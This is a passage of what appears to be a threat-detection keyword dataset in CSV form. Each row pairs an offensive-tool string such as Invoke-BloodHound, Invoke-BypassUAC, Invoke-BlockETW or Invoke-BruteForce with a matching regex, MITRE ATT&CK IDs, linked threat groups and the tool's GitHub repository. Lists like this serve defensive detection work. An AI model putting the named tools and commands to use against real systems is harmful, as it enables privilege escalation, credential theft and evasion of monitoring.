enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","48859" "*Invoke-BitlockerCheck*",".{0,1000}Invoke\-BitlockerCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48860" "*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48861" "*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48862" "*Invoke-BloodHound -CollectionMethod*",".{0,1000}Invoke\-BloodHound\s\-CollectionMethod.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). 
It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","48863" "*Invoke-BloodHound -CollectionMethods *",".{0,1000}Invoke\-BloodHound\s\-CollectionMethods\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","48864" "*InvokeBloodHound*",".{0,1000}InvokeBloodHound.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","48865" "*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","48866" "*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48867" "*invoke-bloodhound*",".{0,1000}invoke\-bloodhound.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48868" "*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","48869" "*Invoke-Bloodhound.ps1*",".{0,1000}Invoke\-Bloodhound\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","48870" 
"*Invoke-Bof *",".{0,1000}Invoke\-Bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","48871" "*Invoke-Bof.ps1*",".{0,1000}Invoke\-Bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","48872" "*Invoke-Boolang.ps1*",".{0,1000}Invoke\-Boolang\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - 
T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48873" "*Invoke-BruteAvailableLogons*",".{0,1000}Invoke\-BruteAvailableLogons.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","48874" "*Invoke-BruteClientIDAccess*",".{0,1000}Invoke\-BruteClientIDAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Test different client_id's against MSGraph to determine permissions","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48875" "*Invoke-BruteForce*",".{0,1000}Invoke\-BruteForce.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of 
PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48876" "*Invoke-BruteLogonAccount*",".{0,1000}Invoke\-BruteLogonAccount.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","48877" "*Invoke-BruteLogonList*",".{0,1000}Invoke\-BruteLogonList.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","48878" "*Invoke-BSOD*",".{0,1000}Invoke\-BSOD.{0,1000}","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. 
Also enumerates Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","N/A","3","298","70","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z","48879" "*Invoke-BSOD.ps1*",".{0,1000}Invoke\-BSOD\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48880" "*Invoke-BuildAnonymousSMBServer -*",".{0,1000}Invoke\-BuildAnonymousSMBServer\s\-.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 -
T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","N/A","6","3","229","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z","48881" "*Invoke-BuildAnonymousSMBServer.ps1*",".{0,1000}Invoke\-BuildAnonymousSMBServer\.ps1.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","N/A","6","3","229","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z","48882" "*Invoke-BypassUAC -Command *",".{0,1000}Invoke\-BypassUAC\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - 
Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48883" "*Invoke-BypassUAC*",".{0,1000}Invoke\-BypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48884" "*Invoke-BypassUAC.ps1*",".{0,1000}Invoke\-BypassUAC\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48885" "*Invoke-BypassUACTokenManipulation*",".{0,1000}Invoke\-BypassUACTokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48886" "*Invoke-CallbackIEX*",".{0,1000}Invoke\-CallbackIEX.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48887" "*Invoke-CallbackIEX*",".{0,1000}Invoke\-CallbackIEX.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims 